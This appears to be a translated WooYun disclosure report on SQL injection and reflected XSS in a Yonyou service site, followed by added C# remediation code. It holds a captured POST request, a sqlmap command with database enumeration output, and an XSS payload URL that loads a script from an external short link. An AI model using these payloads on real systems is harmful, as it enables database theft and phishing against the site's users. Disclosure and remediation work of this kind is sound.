WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online viewer -------- http://drop.zone.ci/
2015-02-11: details sent to the vendor, awaiting vendor handling. 2015-02-16: the vendor has chosen to ignore the vulnerability; details are disclosed to the public.
A sub-site has several POST injection points and a reflected XSS
http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?Page=2&xinwenlxbh=&XinWenMC=1
http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20080328001
http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20071204001&XinWenMC=1
http://service.yonyou.com/ajax/ajax,UFIDA.Service.ashx?_method=GetChanPinBB&_session=no
POST /AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1 HTTP/1.1
Host: service.yonyou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1
Cookie: Hm_lvt_4280908fd6c5e0139940ea31e0eb68e1=1423411490; Hm_lpvt_4280908fd6c5e0139940ea31e0eb68e1=1423445237; ASP.NET_SessionId=gepvgwn2b3lfa445vesgxkmd
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3210

__LastVIEWSTATE_SessionKey=51ff6eeb-d9a0-4c5f-ae02-7d0cc6f8014a&__ContextPath=%2F&_qam_dialog_control=&__VIEWSTATE=[base64 __VIEWSTATE blob omitted]&textfield=&ddlXinWenLB=XWLX20061113004&TextBox1=1&Button1=+&__EVENTVALIDATION=%2FwEWDwLO25KWDAKnuseIDAL9xZrmBwLW%2FrzLDQKb3c%2FnBALSkNa7CwKd2L%2FlBgKyuYTlAwLl%2Ff2lDQKD9a6lAgLZgOLwBQLS85D9CwLxrNb6AwLs0bLrBgKM54rGBn9%2FiG7ONSGvbs1Lr0qWStvPanIJ
Submit data in the search box, capture the request, and feed it to sqlmap. The XSS is only reflected, but it can still be used for phishing.
http://service.yonyou.com/error.aspx?errinfo=1
available databases [9]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test
[*] UFServiceClubData
[*] UFWeb
[*] UFWeb_Dev
[*] We7_CMS

sqlmap.py -r yonyou.txt -p TextBox1 -D We7_CMS --tables
http://service.yonyou.com//error.aspx?errinfo=1</textarea>'"><script src=http://t.cn/RwAegK3></script>
Filter the input...
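The fix suggestion above just says "filter". As an added example that is not part of the original report and not Yonyou's code, this is how the two reported defects would be closed in ASP.NET Web Forms code-behind: a parameterized query for the search field and HTML encoding of the reflected errinfo value. Table and column names, ConnStr, GridView1 and ErrorLabel are hypothetical; TextBox1 and Button1 are the form fields seen in the captured request.

```csharp
// Added example, not Yonyou's code. Table/column names, ConnStr, GridView1 and
// ErrorLabel are hypothetical; TextBox1/Button1 are the fields in the captured request.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.UI;

public partial class XinWen : Page
{
    private const string ConnStr = "<connection string>"; // hypothetical placeholder
    // Vulnerable pattern, what sqlmap exploited through TextBox1:
    //   "... WHERE MingCheng LIKE '%" + TextBox1.Text + "%'"
    // Fixed: the keyword travels as a typed parameter, so the statement text never
    // changes; LIKE wildcards are escaped so the input cannot widen the match either.
    private static SqlCommand BuildSafeCommand(SqlConnection conn, string keyword)
    {
        var cmd = new SqlCommand(
            "SELECT BianHao, MingCheng FROM XinWen WHERE MingCheng LIKE @kw", conn);
        string escaped = keyword.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
        cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 200).Value = "%" + escaped + "%";
        return cmd;
    }

    protected void Button1_Click(object sender, EventArgs e)
    {
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = BuildSafeCommand(conn, TextBox1.Text))
        {
            conn.Open();
            using (var reader = cmd.ExecuteReader())
            {
                GridView1.DataSource = reader;
                GridView1.DataBind();
            }
        }
    }
}

// error.aspx: errinfo is reflected into the page unencoded. Encoding it on output turns
// the PoC's </textarea>'"><script> sequence into inert text.
public partial class ErrorPage : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        string info = Request.QueryString["errinfo"] ?? string.Empty;
        ErrorLabel.Text = HttpUtility.HtmlEncode(info); // Label.Text is not encoded by default
    }
}
```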
Severity: no impact, vendor ignored
Ignored at: 2015-02-16 17:50
None yet